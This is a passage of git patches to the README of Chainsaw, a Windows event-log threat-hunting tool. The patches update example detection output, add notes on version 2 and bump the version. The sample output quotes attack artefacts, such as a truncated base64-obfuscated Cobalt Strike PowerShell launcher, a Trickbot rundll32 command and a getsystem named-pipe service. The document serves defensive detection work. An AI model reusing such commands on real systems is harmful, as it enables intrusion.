vMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnN │ │ - │ │ │ │ │ │ lKCRkKTtJRVgoWyc... 
│ │ - │ │ │ │ │ │ │ │ - │ │ │ │ │ │ (use --full to show all content) │ │ - ├─────────────────────┼───────────────────────────────┼───────┼─────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ - │ 2019-11-03 13:51:58 │ ‣ Suspicious Shells Spawn │ 1 │ MSEDGEWIN10 │ C:\Windows\System32\cmd.exe │ "C:\Windows\system32\cmd.exe" /c set > c │ "c:\Program Files\Microsoft SQL Server\M │ - │ │ by SQL Server │ │ │ │ :\users\\public\netstat.txt │ SSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.ex │ - │ │ │ │ │ │ │ e" -sSQLEXPRESS │ - ├─────────────────────┼───────────────────────────────┼───────┼─────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ - │ 2020-10-20 22:33:02 │ ‣ Trickbot Malware Activity │ 1 │ MSEDGEWIN10 │ C:\Windows\System32\wermgr.exe │ C:\Windows\system32\wermgr.exe │ rundll32.exe c:\temp\winfire.dll,DllRegi │ - │ │ │ │ │ │ │ sterServer │ - └─────────────────────┴───────────────────────────────┴───────┴─────────────┴──────────────────────────────────────────┴──────────────────────────────────────────┴──────────────────────────────────────────┘ + [+] Group: Antivirus + ┌─────────────────────┬────────────────────┬──────────┬───────────┬─────────────┬────────────────────────────────┬──────────────────────────────────┬────────────────────┐ + │ timestamp │ detections │ Event ID │ Record ID │ Computer │ Threat Name │ Threat Path │ User │ + ├─────────────────────┼────────────────────┼──────────┼───────────┼─────────────┼────────────────────────────────┼──────────────────────────────────┼────────────────────┤ + │ 2019-07-18 20:40:00 │ ‣ Windows Defender │ 1116 │ 37 │ MSEDGEWIN10 │ Trojan:PowerShell/Powersploit. 
│ file:_C:\AtomicRedTeam\atomic- │ MSEDGEWIN10\IEUser │ + │ │ │ │ │ │ M │ red-team-master\atomics\T1056\ │ │ + │ │ │ │ │ │ │ Get-Keystrokes.ps1 │ │ + ├─────────────────────┼────────────────────┼──────────┼───────────┼─────────────┼────────────────────────────────┼──────────────────────────────────┼────────────────────┤ + │ 2019-07-18 20:53:31 │ ‣ Windows Defender │ 1117 │ 106 │ MSEDGEWIN10 │ Trojan:XML/Exeselrun.gen!A │ file:_C:\AtomicRedTeam\atomic- │ MSEDGEWIN10\IEUser │ + │ │ │ │ │ │ │ red-team-master\atomics\T1086\ │ │ + │ │ │ │ │ │ │ payloads\test.xsl │ │ + └─────────────────────┴────────────────────┴──────────┴───────────┴─────────────┴────────────────────────────────┴──────────────────────────────────┴────────────────────┘ + + [+] Group: Log Tampering + ┌─────────────────────┬───────────────────────────────┬──────────┬───────────┬────────────────────────────────┬───────────────┐ + │ timestamp │ detections │ Event ID │ Record ID │ Computer │ User │ + ├─────────────────────┼───────────────────────────────┼──────────┼───────────┼────────────────────────────────┼───────────────┤ + │ 2019-01-20 07:00:50 │ ‣ Security Audit Logs Cleared │ 1102 │ 32853 │ WIN-77LTAPHIQ1R.example.corp │ Administrator │ + └─────────────────────┴───────────────────────────────┴──────────┴───────────┴────────────────────────────────┴───────────────┘ + + [+] Group: Sigma + ┌─────────────────────┬────────────────────────────────┬───────┬────────────────────────────────┬──────────┬───────────┬──────────────────────────┬──────────────────────────────────┐ + │ timestamp │ detections │ count │ Event.System.Provider │ Event ID │ Record ID │ Computer │ Event Data │ + ├─────────────────────┼────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼──────────────────────────┼──────────────────────────────────┤ + │ 2019-04-29 20:59:14 │ ‣ Malicious Named Pipe │ 1 │ Microsoft-Windows-Sysmon │ 18 │ 8046 │ IEWIN7 │ --- │ + │ │ │ │ │ │ │ │ Image: System │ + │ │ │ 
│ │ │ │ │ PipeName: "\\46a676ab7f179e511 │ + │ │ │ │ │ │ │ │ e30dd2dc41bd388" │ + │ │ │ │ │ │ │ │ ProcessGuid: 365ABB72-D9C4-5CC │ + │ │ │ │ │ │ │ │ 7-0000-0010EA030000 │ + │ │ │ │ │ │ │ │ ProcessId: 4 │ + │ │ │ │ │ │ │ │ RuleName: "" │ + │ │ │ │ │ │ │ │ UtcTime: "2019-04-29 20:59:14. │ + │ │ │ │ │ │ │ │ 430" │ + ├─────────────────────┼────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼──────────────────────────┼──────────────────────────────────┤ + │ 2019-04-30 20:26:51 │ ‣ CobaltStrike Service │ 1 │ Microsoft-Windows-Sysmon │ 13 │ 9806 │ IEWIN7 │ --- │ + │ │ Installations in Registry │ │ │ │ │ │ Details: "%%COMSPEC%% /b /c st │ + │ │ │ │ │ │ │ │ art /b /min powershell.exe -no │ + │ │ │ │ │ │ │ │ p -w hidden -noni -c \"if([Int │ + │ │ │ │ │ │ │ │ Ptr]::Size -eq 4){$b='powershe │ + │ │ │ │ │ │ │ │ ll.exe'}else{$b=$env:windir+'\ │ + │ │ │ │ │ │ │ │ \syswow64\\WindowsPowerShell\\ │ + │ │ │ │ │ │ │ │ v1.0\\powershell.exe'};$s=New- │ + │ │ │ │ │ │ │ │ Object System.Diagnostics.Proc │ + │ │ │ │ │ │ │ │ essStartInfo;$s.FileName=$b;$s │ + │ │ │ │ │ │ │ │ .Arguments='-noni -nop -w hidd │ + │ │ │ │ │ │ │ │ en -c &([scriptblock]::create( │ + │ │ │ │ │ │ │ │ (New-Object IO.StreamReader(Ne │ + │ │ │ │ │ │ │ │ w-Object IO.Compression.GzipSt │ + │ │ │ │ │ │ │ │ ream((New-Object IO.MemoryStre │ + │ │ │ │ │ │ │ │ am(,[Convert]::FromBase64Strin │ + │ │ │ │ │ │ │ │ g(''H4sIAIuvyFwCA7VW+2/aSBD+OZ │ + │ │ │ │ │ │ │ │ H6P1... 
│ + │ │ │ │ │ │ │ │ (use --full to show all content) │ + │ │ │ │ │ │ │ │ EventType: SetValue │ + │ │ │ │ │ │ │ │ Image: "C:\\Windows\\system32\ │ + │ │ │ │ │ │ │ │ \services.exe" │ + │ │ │ │ │ │ │ │ ProcessGuid: 365ABB72-2586-5CC │ + │ │ │ │ │ │ │ │ 9-0000-0010DC530000 │ + │ │ │ │ │ │ │ │ ProcessId: 460 │ + │ │ │ │ │ │ │ │ RuleName: "" │ + │ │ │ │ │ │ │ │ TargetObject: "HKLM\\System\\C │ + │ │ │ │ │ │ │ │ urrentControlSet\\services\\he │ + │ │ │ │ │ │ │ │ llo\\ImagePath" │ + │ │ │ │ │ │ │ │ UtcTime: "2019-04-30 20:26:51. │ + │ │ │ │ │ │ │ │ 934" │ + ├─────────────────────┼────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼──────────────────────────┼──────────────────────────────────┤ + │ 2019-05-12 12:52:43 │ ‣ Meterpreter or Cobalt │ 1 │ Service Control Manager │ 7045 │ 10446 │ IEWIN7 │ --- │ + │ │ Strike Getsystem Service │ │ │ │ │ │ AccountName: LocalSystem │ + │ │ Installation │ │ │ │ │ │ ImagePath: "%COMSPEC% /c ping │ + │ │ │ │ │ │ │ │ -n 1 127.0.0.1 >nul && echo 'W │ + │ │ │ │ │ │ │ │ inPwnage' > \\\\.\\pipe\\WinPw │ + │ │ │ │ │ │ │ │ nagePipe" │ + │ │ │ │ │ │ │ │ ServiceName: WinPwnage │ + │ │ │ │ │ │ │ │ ServiceType: user mode service │ + │ │ │ │ │ │ │ │ StartType: demand start │ + ├─────────────────────┼────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼──────────────────────────┼──────────────────────────────────┤ + │ 2019-06-21 07:35:37 │ ‣ Dumpert Process Dumper │ 1 │ Microsoft-Windows-Sysmon │ 11 │ 238375 │ alice.insecurebank.local │ --- │ + │ │ │ │ │ │ │ │ CreationUtcTime: "2019-06-21 0 │ + │ │ │ │ │ │ │ │ 6:53:03.227" │ + │ │ │ │ │ │ │ │ Image: "C:\\Users\\administrat │ + │ │ │ │ │ │ │ │ or\\Desktop\\x64\\Outflank-Dum │ + │ │ │ │ │ │ │ │ pert.exe" │ + │ │ │ │ │ │ │ │ ProcessGuid: ECAD0485-88C9-5D0 │ + │ │ │ │ │ │ │ │ C-0000-0010348C1D00 │ + │ │ │ │ │ │ │ │ ProcessId: 3572 │ + │ │ │ │ │ │ │ │ RuleName: "" │ + │ │ │ │ │ │ │ │ TargetFilename: "C:\\Windows\\ │ + 
│ │ │ │ │ │ │ │ Temp\\dumpert.dmp" │ + │ │ │ │ │ │ │ │ UtcTime: "2019-06-21 07:35:37. │ + │ │ │ │ │ │ │ │ 324" │ + └─────────────────────┴────────────────────────────────┴───────┴────────────────────────────────┴──────────┴───────────┴──────────────────────────┴──────────────────────────────────┘ ## Table Of Contents @@ -98,6 +136,7 @@ Chainsaw provides a powerful ‘first-response’ capability to quickly identify - [Quick Start Guide](#quick-start-guide) - [Downloading and Running](#downloading-and-running) - [EDR and AV Warnings](#edr-and-av-warnings) + - [What Changed In Chainsaw v2](#what-changed-in-chainsaw-v2) - [Examples](#examples) - [Searching](#searching) - [Hunting](#hunting) @@ -116,7 +155,7 @@ At the time of writing, there are very few open-source, standalone tools that pr ## Hunting Logic ### Sigma Rule Matching -Using the `--sigma` and `--mapping` parameters you can specify a directory containing a subset of SIGMA detection rules (or just the entire SIGMA git repo) and chainsaw will automatically load, convert and run these rules against the provided event logs. The mapping file tells chainsaw what event IDs to run the detection rules against, and what fields are relevant. By default the following event IDs are supported: +Using the `--sigma` and `--mapping` parameters you can specify a directory containing a subset of SIGMA detection rules (or just the entire SIGMA git repo) and chainsaw will automatically load, convert and run these rules against the provided event logs. The mapping file tells chainsaw which fields in the event logs to use for rule matching. By default, Chainsaw supports a wide range of Event Log types, including but not limited to: |Event Type|Event ID | |--|--| 
@@ -130,6 +169,8 @@ Using the `--sigma` and `--mapping` parameters you can specify a directory conta
 |Scheduled Task Creation|4698|
 |Service Creation|7045|
+See the mapping file for the full list of fields that are used for rule detection, and feel free to extend it to your needs.
+
 ### Chainsaw Detection Rules
 In addition to supporting sigma rules, Chainsaw also supports a custom rule format. In the repository you will find a `rules` directory that contains various Chainsaw rules that allows users to:
@@ -163,7 +204,7 @@ git clone https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES.git
 ```
 and then run Chainsaw with the parameters below:
 ```
-./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml
+./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs-all.yml
 ```
 ### EDR and AV Warnings
@@ -171,6 +212,23 @@ When downloading and running chainsaw you may find that your local EDR / AntiVir
 These warnings are typically due to the example event logs and/or Sigma rules which contain references to malicious strings (e.g. "mimikatz"). We have also seen instances where the Chainsaw binary has been detected by a small subset of Anti-Virus engines likely due to some form of heuristics detection.
+### What Changed In Chainsaw v2?
+
+In July 2022 we released version 2 of Chainsaw which is a major overhaul of how Chainsaw operates. Chainsaw v2 contains a number of significant improvements, including the following list of highlights:
+
+ - An improved approach to mapping Sigma rules which results in a significant increase in the number of supported Chainsaw rules, and Event Log event types.
+ - Improved CLI output which shows a snapshot of all Event Data for event logs containing detections.
+ - Support for loading and parsing Event Logs in both JSON and XML format.
+ - Cleaner and simpler command line arguments for the Hunt and Search features.
+ - Additional optional output information, such as Rule Author, Rule Status, Rule Level etc.
+ - The ability to filter loaded rules by status, kind, and severity level.
+ - Inbuilt Chainsaw Detection rules have been broken out into dedicated Chainsaw rule files
+ - A clean and rewrite of Chainsaw's code to improve readability and to reduce the overhead for community contributions.
+
+If you still wish to use the version 1 of Chainsaw, you can find compiled binaries in the [releases section](https://github.com/countercept/chainsaw/releases), or you can access the source code in the [v1.1.7 branch](https://github.com/countercept/chainsaw/tree/v1.1.7). Please note that Chainsaw v1 is no longer being maintained, and all users should look to move to Chainsaw v2.
+
+A massive thank you to [@AlexKornitzer](https://twitter.com/AlexKornitzer?lang=en) who managed to convert Chainsaw v1's "Christmas Project" codebase into a polished product in v2.
+
 ## Examples
 ### Searching
@@ -255,15 +313,15 @@ These warnings are typically due to the example event logs and/or Sigma rules wh
 *Hunt through all evtx files using Sigma rules for detection logic*
- ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml
+ ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs-all.yml
 *Hunt through all evtx files using Sigma rules and Chainsaw rules for detection logic and output in CSV format to the results folder*
- ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml -r rules/ --csv --output results
+ ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs-all.yml -r rules/ --csv --output results
 *Hunt through all evtx files using Sigma rules for detection logic, only search between specific timestamps, and output the results in JSON format*
- ./chainsaw hunt evtx_attack_samples/ -s sigma_rules --mapping mappings/sigma-event-logs.yml --from "2019-03-17T19:09:39" --to "2019-03-17T19:09:50" --json
+ ./chainsaw hunt evtx_attack_samples/ -s sigma_rules --mapping mappings/sigma-event-logs-all.yml --from "2019-03-17T19:09:39" --to "2019-03-17T19:09:50" --json
 ### Acknowledgements
 - [EVTX-ATTACK-SAMPLES](https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES) by [@SBousseaden](https://twitter.com/SBousseaden)
From 856b3215df3d995710c66be55fc973359f6d04ff Mon Sep 17 00:00:00 2001
From: FranticTyping
Date: Mon, 11 Jul 2022 23:20:31 +0100
Subject: [PATCH 76/77] build: bump to v2.0.0-beta.0
---
 Cargo.toml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Cargo.toml b/Cargo.toml
index e9d3c540..7972cdd7 100644
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -1,6 +1,6 @@
 [package]
 name = "chainsaw"
-version = "2.0.0-alpha.6"
+version = "2.0.0-beta.0"
 repository = "https://github.com/countercept/chainsaw"
 description = "Rapidly Search and Hunt Through Windows Event Logs"
 authors = ["James Dorgan ","Alex Kornitzer "]
From 43b49dacfa307bb2df65e2a933fc47a89e77e8e8 Mon Sep 17 00:00:00 2001
From: FranticTyping
Date: Mon, 11 Jul 2022 23:27:06 +0100
Subject: [PATCH 77/77] docs: update readme for beta release
---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 4b1ebe86..d485c335 100644
--- a/README.md
+++ b/README.md
@@ -225,7 +225,7 @@ In July 2022 we released version 2 of Chainsaw which is a major overhaul of how
 - Inbuilt Chainsaw Detection rules have been broken out into dedicated Chainsaw rule files
 - A clean and rewrite of Chainsaw's code to improve readability and to reduce the overhead for community contributions.
-If you still wish to use the version 1 of Chainsaw, you can find compiled binaries in the [releases section](https://github.com/countercept/chainsaw/releases), or you can access the source code in the [v1.1.7 branch](https://github.com/countercept/chainsaw/tree/v1.1.7). Please note that Chainsaw v1 is no longer being maintained, and all users should look to move to Chainsaw v2.
+If you still wish to use the version 1 of Chainsaw, you can find compiled binaries in the [releases section](https://github.com/countercept/chainsaw/releases), or you can access the source code in the [v1.x.x branch](https://github.com/countercept/chainsaw/tree/v1.x.x). Please note that Chainsaw v1 is no longer being maintained, and all users should look to move to Chainsaw v2.
 A massive thank you to [@AlexKornitzer](https://twitter.com/AlexKornitzer?lang=en) who managed to convert Chainsaw v1's "Christmas Project" codebase into a polished product in v2.